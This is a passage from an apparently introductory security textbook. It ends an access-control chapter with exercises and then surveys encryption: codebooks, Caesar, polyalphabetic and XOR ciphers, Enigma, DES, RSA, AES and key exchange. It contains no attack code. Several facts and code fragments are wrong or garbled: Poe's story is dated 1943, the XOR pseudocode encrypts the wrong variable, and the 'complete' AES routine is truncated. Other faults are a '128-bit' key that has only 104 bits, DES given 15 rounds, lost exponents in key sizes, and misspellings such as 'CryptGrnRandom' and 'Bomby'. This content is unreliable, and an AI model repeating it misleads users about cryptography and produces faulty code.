x Keep secret things secret
x Write-down permitted
x Read-up prevented
x Write-up allowed
x Unconfirmed
11 Define the C++ data structure(s) necessary to represent the ACL notion of
control.
266 | Chapter 11: Access Control | Unit 3: Privacy | Security for Software Engineers
Problems
1 Start with a program of your choice. Modify this program to provide
confidentiality assurances by implementing the Bell-LaPadula system. Please
use the following permissions:
x Bob, Hans: access to everything
x Sam, Sue, Sly: access to name and weight
x Everyone else: no access
2 Start with a program of your choice. Modify this program to provide integrity
assurances by implementing the Biba system. Please use the following
permissions:
x Bob: access to everything
x Hans: access to scores but not weight
x Sam, Sue, Sly: no access
x Everyone else: no access
3 Please take a close look at how the Unix system implements ACLs and how the
Microsoft Windows NT platform implements ACLs. On the surface, they may
seem quite different. Your job is to determine whether one is more powerful /
descriptive than the other. In other words:
x Can any Unix ACL policy be expressed in terms of a Microsoft Windows NT
ACL?
x Can any Microsoft Windows NT ACL policy be expressed in terms of a Unix
ACL?
Security for Software Engineers | Unit 3: Privacy | Chapter 11: Access Control | 267
Chapter 12: Encryption
Encryption algorithms (otherwise known as ciphers) are tools commonly employed by software engineers
to provide security assurances. It is not important that you memorize these algorithms or even have more
than a general understanding of how they work. The critical skill to learn here is how to apply encryption
algorithms to solve security problems.
268 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Alice Alice is the originator of an encrypted message. It is the goal of Alice to send a
message in such a way that only the intended recipient (Bob) can receive it. The
method Alice chooses needs to provide confidentiality (only Bob will be able to
read it), integrity (the message will reach Bob unaltered), and availability (the
message will eventually make it to Bob). Note that the encryption algorithm only
addresses the issue of confidentiality and integrity. The channel of
communication addresses the availability variable in the equation.
Bob Bob is the recipient of the message. It is the goal of Bob to establish the
authenticity of the message. In other words, Bob needs confirmation that the
message came from Alice and the message is unaltered. One can remember Alice
and Bob because the message goes from A to B.
Eve Eve is an eavesdropper in the communication between Alice and Bob. Alice and
Bob do not wish for Eve to be able to read the message or to alter the message.
Typically, Eve’s number one goal is to disclose the message of Alice. Frequently
she would also wish to alter the message. When all else fails, she strives to deny
Bob access to receiving the message. One can remember the name Eve because
it comes from “Eavesdropper.” Another name commonly found in the literature
is “Trudy,” short for “intruder.”
Encryption algorithms provide the confidentiality and integrity services
demanded by Alice and Bob by transforming the message into a format Eve
cannot read. The original message, called plaintext because it can be read by
anyone, is converted by Alice using an encryption algorithm into a presumably
unreadable format called the ciphertext or cryptogram. Bob, upon receiving the
ciphertext, decrypts the message using the same algorithm in Alice’s original
plaintext message. The process is successful if Eve cannot decrypt the ciphertext
and if she cannot alter the ciphertext without Bob’s knowledge.
Alice Bob
B b
EEve
Figure 12.1: The three characters in most encryption scenarios: Alice, Bob, and Eve
To see how encryption algorithms can be useful tools to address security
concerns, we will first learn how they work and then see several applications in
security problems.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 269
How Encryption Algorithms Work
An encryption algorithm is a function that transforms plaintext messages Mp into
ciphertext messages Mc. The security of this function C does not come from the
secrecy of the algorithm which transforms the plaintext message into a ciphertext
message. Instead, it comes from the secret password or key (called K for “key”)
which dictates this process. Thus we can describe the encryption process as:
Mc Å C(Mp, K)
In this case, Alice will generate the ciphertext which will then be sent to Bob:
C(Mp, K) Mc
Alice Bob
B b
Figure 12.2: Alice sending an encrypted message to Bob
The problem is slightly more complex than this. Some encryption algorithms use
a different method to encrypt a message than is used to decrypt it. The encryption
function has the + symbol and the decryption one uses a – symbol:
Mc Å C+(Mp, K)
Mp Å C-(Mc, K)
Here Alice will encrypt her plaintext message Mp with C+(Mp, K). That ciphertext Mc
is then sent to Bob through a potentially insecure channel such as the Internet.
Bob then receives this message and retrieves the plaintext message using the
decryption algorithm C-(Mc, K).
C+(Mp, K) Mc C-(Mc, K)
Alice Bob
Bob
Bo
Figure 12.3: Alice sending a message to Bob and Bob decrypting the message
There are several ways to classify encryption algorithms: symmetric vs.
asymmetric, stream vs. block ciphers, and steganography vs. cryptography.
270 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Symmetric vs. Asymmetric
Secure message transmission between Alice and Bob involves Alice encrypting a
message and Bob decrypting it. There are two basic ways this can be done:
symmetric and asymmetric:
Symmetric algorithms use the same key to both encrypt a message and decrypt
a message. This means that anyone who can decrypt a message can also encrypt
Symmetric
one. Symmetric algorithms tend to be faster than asymmetric ones. In fact, they
are typically a hundred times faster!
Asymmetric algorithms are also known as public-key. They use a different key to
encrypt a message than to decrypt one. This means it is possible to segment the
world of users into three categories: those who have the ability to create a
cryptogram, those able to read a cryptogram, and those lacking the ability to do
Asymmetric
either. Asymmetric algorithms are commonly used in scenarios when the author
of the message needs to be confirmed. If the decrypt key is commonly known,
then the authorship of a message can be restricted to only the set of individuals
possessing the encryption key.
A block algorithm sub-divides messages into chunks, each chunk being operated
on somewhat independently. For example, the DES algorithm works on 64-bit
Block blocks whereas AES works on 128-bit blocks. Block algorithms often provide
security and performance advantages over stream algorithms because more
complex algorithms can be used.
Note that the distinction between a block and a stream is completely artificial.
For example, consider one algorithm that operates on 8-bit blocks and another
on 2048-bit blocks. Most would classify the former as stream and the latter as
block even though both work on blocks of different sizes. In other words, all block
algorithms are also stream and vice versa; the distinction is not very important.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 271
Steganography vs. Cryptography
Confidentiality is one of the main goals of encryption. However, often one wishes
for confidentiality in the existence of the message rather than in the content of
the message.
The process of making the existence of the message difficult to detect by Eve.
Steganography Steganography is useful when the goal of the transmission is to keep Eve from
knowing that the message exists (Anderson & Petitcolas, 1998).
272 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Encryption Attacks
The history of encryption development is paralleled by the history of encryption
attacks. Most ad-hoc ciphers are easily broken because they do not rely on sound
mathematical principles. Getting cryptography right is extremely difficult and
requires very good mathematical and analytical skills.
There are three broad categories of attacks relating to the amount of access the
attacker has to the algorithm: chosen plaintext attacks, known plaintext attacks,
and ciphertext only attacks.
Chosen plaintext The adversary may ask the specific plaintexts to be encrypted; the goal is to find
the key. For example, Eve convinces Alice to encrypt a plaintext message of her
choosing. Eve will then gain important clues as to the type of algorithm used and
the nature of the key. Another example is Eve being in possession of the
algorithm. She continues to send in several plaintext messages and carefully
analyzes the resulting ciphertext in hopes of uncovering the key. Note that this is
one of the rare scenarios where the speed of the algorithm is to the advantage
of the attacker: the more efficient the algorithm, the more messages the attacker
can use to find the key.
Known plaintext The adversary has the ciphertext and the plaintext and the goal is to find the key
used in the encryption. For example, Eve is in possession of both the ciphertext
and the plaintext, with which she attempts to uncover the key. With this key, she
can decipher future ciphertext. Any time Eve knows something about the
plaintext, it is considered a known plaintext attack. One common known
plaintext attack is the Golden Bug. The Golden Bug attack leverages the fact that
the frequency of letters in the alphabet is known for a given language. In English,
for example, the letter 'E' is the most common. By analyzing the ciphertext for
the number of occurrences of a given letter, the real letter can be found by
comparing the commonality of the given letter with the standard for that
language.
Ciphertext only The adversary has the ciphertext and the goal is to find the plaintext meaning.
Eve intercepts the ciphertext and, from it alone, is able to derive the key and thus
the plaintext. One may argue that it is impossible to create a ciphertext only
attack because the attacker will have no way of knowing if the real plaintext is
found. In other words, if the attacker has no knowledge of the plaintext, it is
impossible to differentiate an invalid plaintext from the valid one. All successful
ciphertext only attacks involve at least partial knowledge of the plaintext, such
as the language the plaintext message is written in.
Encryption attacks are thwarted with key management and key size. Key
management is the process of preventing the key from falling into the hands of
Eve. If, for example, Eve is able to predict Alice’s key, then there is no point in
trying a more laborious attack on the algorithm. This is why it is important to use
a cryptographically strong random number generator when creating a key.
Key size is the number of possible keys for a given algorithm. We normally
measure key size in bits. For example, if the key size is 8, then there are 28 or 256
possible keys. This means Eve has a 1/256 chance of guessing the key on the first
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 273
try or only has to try 256 keys before being guaranteed to find the correct one.
Primitive ciphers (algorithms developed before the age of computers) are
characterized by having small key sizes. They provide confidentiality assurances
by incomprehensibility (the ciphertext looks unreadable) or obscurity (no one
knows how the algorithm works). However, a determined Eve can often decipher
cryptograms without much difficulty.
Modern algorithms can have very large keys. In other words, even in the presence
of complete knowledge of how the algorithm works, it is still extremely difficult
to find the key. Thus modern algorithms rely on the strength of the key rather
than the obscurity of the algorithm to provide security assurances.
Codebooks
The earliest examples of encryption systems can be traced to the Egyptians
around 2,000 BC. Funeral hieroglyphics were carved into tombs using a primitive
code system in order to obscure their meaning. Note that the goal was not to hide
a message as it is with today’s algorithms, but rather to increase the mystery of
the writing. Only privileged individuals could decipher the message.
Algorithm
A codebook works by creating a mapping between a phrase, word, or sound to a
given token. This mapping is represented in a dictionary which constitutes the
key. The most convenient data-structure to represent such a dictionary is an
associative array (also known as a map). Given this key, the algorithm for an
encryption algorithm C+ is straight-forward:
C+(Mp, K)
FOR i Å each token in Mp
Mc Å K[Mp[i]]
RETURN Mc
The loop will iterate through all the tokens (representing phrases, words, or
sounds) in the plaintext Mp. Each of these tokens Mp[i] will be sent to the map K
and the return value will be added onto the ciphertext Mc.
The decryption algorithm is much the same except we will need to perform a
reverse-lookup using the map’s find method.
C-(Mc, K)
FOR i Å each token in Mc
Mp Å K.find(Mc[i])
RETURN Mp
Since the same codebook is used for the encryption and the decryption process,
this algorithm can be classified as symmetric.
274 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Strength
Codebooks are vulnerable to chosen plaintext attacks. If Eve sent all possible
words through the encryption algorithm, she would be able to derive the entirety
of the codebook.
Codebooks are also vulnerable to known plaintext attacks. For each known word
sent through the algorithm, the corresponding ciphertext will be known. This will
result in another known entry in the codebook. Thus, parts of the codebook can
be derived by observing the codebook in action over a period of time.
Before and during WWI, Germany used a codebook for all secure communications.
Unbeknownst to them, many transmissions were intercepted by British
Intelligence. As a result, large swaths of the codebook were known.
In January of 1917, Germany was concerned that America would enter the war on
the side of the Allies. In an effort to reduce the American influence on the war,
German High Command had an idea. They proposed to Mexico that if they entered
the war against America, they could reclaim Texas, Arizona, and New Mexico. A
telegraph with this proposal was sent from Arthur Zimmermann in the German
Foreign Office to the German Foreign Secretary Heinrich von Eckardt in Mexico. It
was intercepted and decoded by the British. The resulting scandal helped push
America into WWI against the Germans.
Figure 12.4: The Zimmerman Telegram. Photograph No. 302025; “Zimmerman Telegram,”
January 1917;Reproduced with permission from National Archives
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 275
Monoalphabetic
Though credit is generally given to Julius Caesar for developing the
monoalphabetic encryption algorithm (also known as the Caesar Cipher),
historical evidence suggests he was just an early adopter. Around 50 BC, Julius
Caesar frequently shifted the letters in his messages down the alphabet when
communicating sensitive messages. This was not a very secure method because
he always used exactly the same key: +3 (or shift to the right by 3 characters).
Algorithm
The monoalphabetic algorithm consists of shifting the alphabet of letters in the
message to the left or right a given number of slots. For the purposes of
illustration, consider two lists of characters. The first list we will call the source
alphabet, the second will be called the destination alphabet. To encrypt a given
letter, one looks up that letter on the source alphabet and finds the
corresponding letter on the destination alphabet. For example, consider the shift
of 7 characters from the source to the destination alphabet:
Source A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Destination H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
Figure 12.5: Monoalphabetic algorithm shifting from the top alphabet to the bottom
In the above illustration, notice how the destination alphabet (starting with ‘H’)
is shifted from the source alphabet. The amount of this shift constitutes the key.
To encrypt the letter ‘C’, look up the letter in the source alphabet and find the
corresponding letter on the destination alphabet as indicated with the arrow. This
is repeated for each letter in the plaintext:
CIPHERS Æ JPWOLYZ
Notice how we need to take into account the size of the alphabet so we can wrap
off the end. The monoalphabetic algorithm is symmetric, but the algorithm is
slightly different on the decryption side. The password +3 performs a right-shift
on encryption but a left-shift on decryption.
C-(Mc, K)
FOR i Å each token in Mc
Mp[i] Å (Mc[i] - K) % sizeAlphabet
RETURN Mp
Strength
The monoalphabetic algorithm is vulnerable to chosen plaintext attacks. If Eve is
able to specify the letter ‘A’ into a plaintext and then observe the resulting
ciphertext, then she can derive the key. The monoalphabetic algorithm is also
vulnerable to known plaintext attacks for exactly the same reason.
Consider the scenario when Eve only knows that the plaintext was in English. By
observing a sizeable amount of ciphertext, she can guess the key in a single
276 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
attempt. This is because the use of letters in the English language is not evenly
distributed. In other words, the letter ‘e’ appears in the English language about
12% of the time. If a letter appears in the ciphertext about 12% of the time, that
letter in the ciphertext probably corresponds to the letter ‘e’ in the plaintext. This
is called the “Golden Bug” attack as it was first described in a story by the same
name written by Edgar Allan Poe in 1943.
Finally, a monoalphabetic key can be derived even when insufficient ciphertext is
available to perform a statistical analysis. Consider, for example, an alphabet of
32 characters (26 letters plus a space and a few punctuation marks). If Eve tries
each of these keys and then checks off that the resulting plaintext is English, the
plaintext message and the key can be readily determined. Only with very large
alphabets (such as the Chinese where there are between 7,000 and 106,230
characters depending on how you count them) is the monoalphabetic algorithm
even remotely secure.
As a final aside, your standard “secret decoder ring” is monoalphabetic. In this
case, the destination alphabet is represented as numbers rather than letters.
Polyalphabetic
Originally developed by Leon Alberti (the “father of western cryptology”) in 1467,
the polyalphabetic algorithm was the most advanced encryption algorithm of the
time. Its introduction marked the beginning of the renaissance of cryptography in
Europe spanning the next several hundred years. The original method was
constructed of two copper disks with the alphabet inscribed on them.
Algorithm
The polyalphabetic (or multi-alphabet) algorithm is just like the monoalphabetic
except that there is more than one shifted alphabet. In the following example,
Destination 1 is +7, Destination 2 is -3, and Destination 3 is +11:
Source A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Destination 1 H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
Destination 2 X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
Destination 3 L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
Figure 12.6: Polyalphabetic algorithm
With each successive character encoded, the next row is used. After the last row
has been used, the first row is used again. Thus:
CIPHERS Æ JFAOBCZ
Notice how the key is an array containing multiple offsets. Other than this detail,
the algorithm is the same.
As with monoalphabetic, the polyalphabetic algorithm is symmetric but has a
slightly different C- than C+ in that the shifting is reversed.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 277
C-(Mc, K)
FOR i Å each token in Mc
Mp[i] Å (Mc[i] - K[i % sizeKey]) % sizeAlphabet
RETURN Mp
Strength
The key to a polyalphabetic algorithm can be readily derived using a chosen
plaintext attack. Unlike the monoalphabetic where a single character is necessary
to derive the key, the number of characters in the key will determine the amount
of text that needs to be encrypted. For example, a polyalphabetic algorithm with
10 offsets will require exactly 10 characters to be encoded before the full key can
be determined. The same can be said for a known plaintext attack.
When Eve has only partial knowledge of the plaintext (such as the language in
which it is written), then a frequency analysis similar to the monoalphabetic can
be employed. To demonstrate this, consider a polyalphabetic key consisting of 26
characters encrypting an alphabet of 26 characters. By just looking at the
ciphertext, all letters will appear to have been used approximately the same
number of times (assuming the key uses all 26 possible offsets in the key). The
Golden Bug appears to be useless in this case! To crack this key, we will sub-divide
the large stream of ciphertext into 26 smaller streams by skipping every 26 slots.
The first stream will contain element 1, 27, 53, and so on. The second stream will
contain element 2, 28, 54, and so on. Now each of these individual streams will
correspond to a single part of the key. In fact, one can say that each of these
individual streams is encrypted with a monoalphabetic algorithm. Thus we can
apply the Golden Bug to them individually and derive the key.
Book Cipher
A book cipher is an encryption method where the plaintext message is converted
to ciphertext through the user of a key and a large volume of text (Leighton &
Matyas, 1984). The key serves as instructions for picking the ciphertext from the
volume. There have been a large number of book cipher algorithms used through
the years, each with varying degrees of practicality and security. The first was
proposed in 1586 by Blaise de Vigenere where a transparent sheet of paper was
placed over a volume of text. Alice would then circle the letters or words of the
plaintext on the transparent sheet. In this case, the ciphertext is the transparent
sheet and the key is the volume of text.
Algorithm
In the 18th century, book cipher techniques improved somewhat. From a given
volume of text, Alice would identify words or letters corresponding to the
plaintext in a volume. She would then note the page number, row, and word
number on a sheet of paper. The resulting coordinates would consist of the
ciphertext.
A more widely used variation of the book cipher involves starting at the beginning
of the book and then skipping ahead a random number of lines. From that point,
search for a word beginning with the letter you wish to encrypt. When that word
is found, the offset from the beginning is the resulting ciphertext. Next, from that
point, skip ahead another random number of lines. From there, start to search
278 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
for a word beginning with the next letter in the plaintext. When a word is found,
take note of its offset from the previously found word. This is the second letter in
the ciphertext. This process continues until the plaintext has been converted.
C+(Mp, K)
offsetPrevious Å 0
FOR i Å each token in Mp
offsetNext Å offsetPrevious + random()
offsetNext Å findWordBeginningWithLetter(offsetNext, K, Mp[i])
Mc[i] Å offsetNext
offsetPrevious Å offsetNext
RETURN Mc
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 279
XOR
The XOR encryption algorithm is perhaps the most common primitive encryption
algorithm to utilize the product method. Product algorithms were first described
by Claude Shannon (the individual who adapted George Boole’s work to
computing systems) in 1949 as a unique approach to cryptography (Shannon,
1949).
Algorithm
This method implies that a block of text is run through a mathematical operation
XOR with the key to generate a ciphertext. If the plaintext is (Mp = 010101) and the
key is (K = 111000), then the ciphertext is (Mc = 101101):
010101
111000
XOR ------
101101
Note that XOR is symmetric: The XOR algorithm is therefore vulnerable to known
plaintext attacks. The pseudocode for the XOR algorithm is the following:
C+(Mp, K)
FOR i Å each token in Mp
Mc[i] Å Mc[i] XOR K
RETURN Mc
This algorithm is symmetric and the decryption method is exactly the same:
C-(Mc, K)
RETURN C+(Mc, K)
Strength
The XOR algorithm is extremely vulnerable to chosen plaintext or known plaintext
attacks. This is because if A XOR B = C, then A XOR C = B. Thus, if the plaintext and
the ciphertext is known, it is trivial to derive the key.
If the plaintext is not known, then the strength of the algorithm depends on the
size of the key. For example, if the key is 32-bits, then there are 232 possible keys.
It turns out that not all the keys need to be tested. For a 32-bit key, there will be
4 bytes encoded with each key. This means we can treat the single ciphertext
encrypted with 32-bits as 4 ciphertexts encrypted with 8-bit sub-keys. Each of
these can be cracked individually. To do this, we will once again use the Golden
Bug. We will search each of the ciphertexts for the most frequent pattern of bits.
These will probably be ‘e’ or the space character. If one assumes it is the ‘e’, we
have a known plaintext and we can derive the sub-key. This is applied to the other
three ciphertexts until all four sub-keys are known. The final step is to decrypt the
entire message using the derived key. Note that if every 4th letter is unexpected,
then one of the sub-keys is probably incorrect. Go back and decrypt using the
second most common letter in the English language.
280 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Rotor machines
The Enigma Machine is one of the most important encryption methods in history
and probably the one most influential in the development of modern algorithms.
Though it relied on mechanical operations to work, its designed was based on
sound mathematics that ensured a high degree of message confidentiality. A
commercial version of the Enigma was developed in the 1920’s and the German
military adapted this design shortly after the Nazis assumed control.
The Enigma was a rotor machine which had four wheels containing letters. When
a plaintext key was pressed on the keyboard, an electrical circuit would pass into
one rotor, then on to the second, then on to the third, then bounce off a reflector
and come back through the third rotor, then second, and back to the first. In the
end, a light would appear indicating the corresponding ciphertext. The final step
would be to rotate each of the rotors. The end result of this complex operation
was an effective key size of 287 bits.
Figure 12.7: Enigma Machine
(Reproduced with permission Efforts to crack the Enigma began in 1932 in Poland. Having obtained several
from www.cryptomuseum.com)
machines and the operations manuals describing how were are to be used, several
messages were decrypted in the 1930s. With the onset of WWII, cracking efforts
moved to Bletchley Park in the English countryside. There Alan Turing built what
many consider to be one of the first true computers to crack the Enigma code. This
computer, called the Bomby, performed a known plaintext attack on intercepted
German transmissions.
In the end, it was a combination of captured key tables, operator mistakes, and
procedural weaknesses that allowed the Allies to decipher most messages. Some
claim that the war was shortened by as much as a year due to their efforts.
The Japanese used a similar machine code-named “Tirpitz” or “Purple” in the
Second World War. It had three rotors like the German Enigma and 25
switchboard connections. The effective key size of the Purple was 246 bits. In an
effort to crack this machine, American scientists had obtained and cracked the
two predecessors (called Blue and Red) and then built their own copy of Purple.
Evidence suggests that the Japanese believed Purple to be uncrackable and did
not revise either the technology or the procedure by which it was operated during
the war. Though it was not completely cracked, the Americans were able to break
Figure 12.8: Purple
many codes using a chosen-plaintext attack. The Soviet Union was also able to
(Reproduced with permission
from www.ciphermachines.com) crack Purple which led to their decision to leave their eastern frontiers
undefended during the war.
The American WW II encryption machine was called the SIGABA which was similar
to the Enigma with an important innovation: the rotors advanced in an
unpredictable way. This made the key-size 2906 bits, though as used in WW II,
the effective key-size was 271. There is no evidence that the SIGABA was ever
cracked. In fact, the Germans were said to have quit collecting SIGABA intercepts
because the key was determined to be too strong.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 281
DES
In 1965, the Brooks Act was passed giving the National Bureau of Standards the
authority and responsibility of creating a new encryption standard designed for
non-military applications. The intention of this work was to identify a method that
would be viable for 10-15 years. In 1973, vendors were invited to submit products
or techniques to be used for this new standard. In 1974, they tried again. With no
proposals, the government resorted to pressuring companies to allow their
internal algorithms for this standard. IBM had one such algorithm called Lucifer
which had a 128-bit key. DES was derived from Lucifer but with a 56-bit key,
significantly weaker than IBM’s original design. The standard was approved in
1976 and was revised in 1988. It was not until 1997 that DES was cracked by a
specialized device (called Deep Crack costing $250,000), finding the key after
trying 18 quadrillion out of the 72 quadrillion possible keys. Today, it can be
broken in about 6 days with $10,000 in hardware costs. DES lasted 21 years after
being approved, longer than the 10–15 it was designed to last. A flowchart
representing the DES algorithm is the following:
A key aspect of the design is the existence of 15 rounds. Each round consists of a
simple algorithm similar to the primitive methods such as polyalphabetic or XOR.
Each round also generates a new set of keys for the rounds that follow. DES, while
old, is still a standard used across much of the world.
One of its successors (TDES or 3DES) is actually nothing more than triple
encryption using two or three DES keys. While still not unbreakable, most of the
attacks on TDES fall into the category of “certification weaknesses.” This means
attacks are theoretically possible though infeasible to mount in the real world.
The adoption of the DES standard can be considered one of the defining events
of the field of cryptography. It represents the first widely publicized and
internationally standardized encryption algorithm, spawning a generation of
mathematicians to study cryptography. Prior to DES, most cryptographers were
members of the military and various intelligence agencies. After DES, an academic
study of encryption, decryption, and computer security became possible.
282 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
RSA
Up through the mid-1970’s, all known practical encryption algorithms were
symmetric. This means that anyone who can decrypt a message can also encrypt
a message with the same key. One implication of this design is that the author of
a given message can be reduced beyond the set of people able to decrypt the
message. There are many message passing scenarios not served by this design,
such as establishing message authorship. To address these scenarios, asymmetric
encryption algorithms are needed.
Asymmetric algorithms use a different key for the encryption process than the
decryption process:
Mc Å C(Mp, P+)
Mp Å C(Mc, P-)
In other words, full knowledge of the knowledge of the password used to encrypt
the message will provide no help in decrypting the message.
Three mathematicians from M.I.T. (Ronald Rivest, Adi Shamir, and Leonard
Adleman) started working on this problem: a practical public-key encryption
algorithm (Rivest & Shamir, 1983). After many false starts, they settled on
factoring as the basis for their algorithm. Factoring promised to be easy for those
encrypting messages (multiplication and prime-verifying is not computationally
expensive) while difficult for the attackers (factorization was believed to be
extremely difficult). To test this theory, the first RSA factoring challenge (RSA-129)
was introduced in Scientific American in 1977. The first to factor the following
number was to be awarded a $100 prize:
114, 381, 625, 757, 888, 867, 669, 235, 779, 976, 146, 612,
010, 218, 296, 721, 242, 362, 562, 561, 842, 935, 706, 935,
245, 733, 897, 830, 597, 123, 563, 958, 705, 058, 989, 075,
147, 599, 290, 026, 879, 543, 541
It was initially estimated to take 40 quadrillion years to factor these numbers, but
they were successfully factored in 1994 with about 1,600 computers using novel
factoring methods. Hidden within these digits were the ciphertext: “The magic
words are squeamish ossifrage.”
The RSA encryption algorithm relies on the fact that prime numbers cannot be
factored or created easily. The details of how this algorithm works and the
mathematical properties RSA uses to accomplish this task are beyond the scope
of this textbook. The important things to know about RSA are the following:
x RSA is the most commonly used asymmetric (also known as public-key) algorithm
to have been developed.
x A 1024-bit RSA key is considered safe today and probably will be for the next
decade. 2048-bit keys will probably be secure for the next century unless a drastic
improvement in factoring technology has developed.
x RSA is 100 to 1000 times slower than comparable symmetric algorithms. For this
reason, RSA is typically used to exchange symmetric keys.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 283
AES
The Advanced Encryption Standard (AES) is specified by the National Institute of
Standards and Technology (NIST). It was the result of a years-long effort to
replace the aging DES standard (Landau, 2000). The NIST had several
requirements for the algorithm to be selected as the new standard:
x It needed to be symmetric (private key).
x It had to support a block size of 128 bits.
x It had to support at least a 96-bit key size (Three different key sizes are supported
128, 192, 256).
In September of 1997, NIST formally requested the submission of candidate
algorithms for evaluation. Of the 21 candidates, 15 met NIST’s criteria. Each
algorithm was analyzed according to verifiability, efficiency of implementation,
and performance. The Rijndael cipher, created by Joan Daemen and Vincent
Rijmen of Belgium, was selected as the leading candidate. In November 2001,
after four years of testing and comparison, the Rijndael algorithm had been
selected as the standard. In June 2003 AES was certified for use protecting
classified government documents, though the original intention was for it to be
used only on unclassified material.
AES works by applying a number of key-dependent Boolean transformations to
the plaintext. The decryption process is the inverse with the same key (Rijndael is
a symmetric algorithm). These Boolean transformations consist of shifting and
rotations, XORs, byte and word substitutions, and shuffling. In other words, the
rounds each perform primitive algorithms operations on the data. It is the
combination of these rounds done in a predetermined order that provides
confidentiality assurances.
The complete AES algorithm is the following:
AES(byte in[4*Nb], byte out[4*Nb], word w[Nb*(Nr+1)])
byte state[4,Nb]
state = in
SubBytes(state)
ShiftRows(state)
AddRoundKey(state, w[Nr*Nb, (Nr+1)*Nb-1])
out = state
end
AES is tuned to produce an optimum of “confusion and diffusion”, while still being
quick and efficient. In other words, each step (SubBytes, ShiftRows, MixColumns, and
AddRoundKey) is computationally simple while adding a high degree of entropy to
the cipher stream. It is meant to be implemented easily in both hardware and
software.
AES has the following properties:
284 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
x AES is fast when implemented in software as well as with dedicated hardware
implementations.
x AES-128 (using a 128-bit key) is secure for the foreseeable future. There have
been many attempts to crack Rijndael since the adoption of AES. None have had
more than a theoretical effect. One of the latest and most successful reduced the
difficulty of obtaining an encryption key from the previous 2119 to 2110.5 for
AES-128. This is no cause for immediate alarm, since 2110.5 is well outside of
practical calculability. The largest known successful brute-force attack on a
symmetric ciphertext was on a 64-bit key.
Applications
There are many reasons why a software engineer would choose to use an
algorithm. These include confidentiality, identification of authorship, key
exchange, certification, and integrity.
Confidentiality
The most obvious application of encryption technology is to keep Eve from
reading a confidential message. Several common confidentiality scenarios include
the following:
Attachments Add a password to your spreadsheet, word processor document, PDF, or other
document so it can be sent via e-mail securely. In this case, a symmetric algorithm
such as AES should be employed. Both Alice and Bob share the knowledge of the
password.
Files A user may choose to put a password on his/her checkbook file. In this case, Alice
and Bob are the same individual. Again, a symmetric algorithm would be used.
Shared Assets Imagine a software product that stores passwords, account information, and
other private data for members of a family. This software product stores all the
assets in a file on a desktop computer or a mobile application. Periodically the
software synchronizes all the files so all the members of the family can have
access to these assets. Again, a symmetric algorithm such as AES would be a good
choice.
Message Passing A mobile communications company wishes to offer confidentiality assurances to
their many wireless customers. This can be accomplished through a symmetric
algorithm as long as both members of a given conversation share the same key.
The trick is to get them to agree on the key at the beginning of the conversation
without Eve’s interception. This key exchange needs to be accomplished through
a different mechanism.
In most confidentiality scenarios, a symmetric algorithm such as AES would be
employed. Our confidentiality assurance comes from two sources: the secrecy of
the key and the strength of the algorithm.
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 285
K
Figure 12.11: Confidentiality where Alice sends Bob a message after first exchanging keys
For Alice and Bob to exchange a secret message, they need to first agree upon a
secret key K. Choosing a weak or well-known key will severely compromise their
confidentiality hopes. For example, a password such as “1234” or “password”
would be among the first Eve would guess. In fact, humans are particularly bad at
choosing strong keys. Instead, a cryptographically strong random number
generator should be employed. The best such generators take as input external
measurements that are known to be chaotic, such as cosmic white noise. On
Microsoft Windows systems, you can use CryptGrnRandom() to achieve this,
taking two dozen system measurements into account to produce a strong
random number. These numbers are computationally indistinguishable from
random bits. An example of a 128-bit key is the following:
0x5f2a2b23722f252d3f6a504640
The second requirement is to choose a strong symmetric algorithm. DES is a
common choice, but has a weak key and can be broken easily. Triple-DES is much
stronger than DES but is slowly being phased out in favor of stronger algorithms.
AES is a viable solution with no known successful attacks so that should be a
consideration. Even for relatively simple applications, it would be unwise to
choose a symmetric encryption algorithm other than Triple-DES or AES.
286 | Chapter 12: Encryption | Unit 3: Privacy | Security for Software Engineers
Identification of Authorship
Another common encryption scenario does not involve privacy at all. Instead of
keeping the message hidden or secret, the goal is to prove that the author is
authentic. The goal is to provide assurance of the integrity of authorship.
To illustrate this scenario, imagine you (Bob) are working as an individual
contributor (IC) in a large organization. As you are working on a project one day,
you get an e-mail from the CEO (Alice). This message is surprising; apparently your
company is merging with your largest competitor and you are to begin sharing
intellectual property (trade secrets) immediately. After the initial shock wears off,
an important question comes to mind: can you trust this message? How do you
know that this message was not created from outside the company in hopes that
someone like you would give away valuable data? At this point in time, you would
like some assurance that the message actually came from your CEO.
Identification of authorship assurance can be achieved through the use of
asymmetric or public-key encryption. In this scenario, the CEO distributes a public
decryption key. Anyone can decrypt a given message with this key but it does not
provide any information as to how to encrypt a message. In fact, the CEO remains
the only person in the world who retains the private key, the key used to encrypt
a message. This means that any message that can be decrypted with the CEO’s
public key must originate from the CEO.
K-
Security for Software Engineers | Unit 3: Privacy | Chapter 12: Encryption | 287
Key Exchange
Recall from our confidentiality scenario mentioned a few pages earlier that for
Alice and Bob to exchange a secret message, they first need to agree on a secret
key. If Eve is able to intercept this key, then all our confidentiality assurances are
lost. One easy way to get around this problem is for Alice and Bob to meet face-
to-face before any message passing takes place. This will certainly work in some
scenarios. However, most scenarios do not have this possibility. It is therefore
necessary to come up with a remote key exchange solution.
K+
1
C-(Kc, K-) Kc C+(KAES, K+)
2
Figure 12.13: Secure key exchange by encrypting a symmetric key with a public key
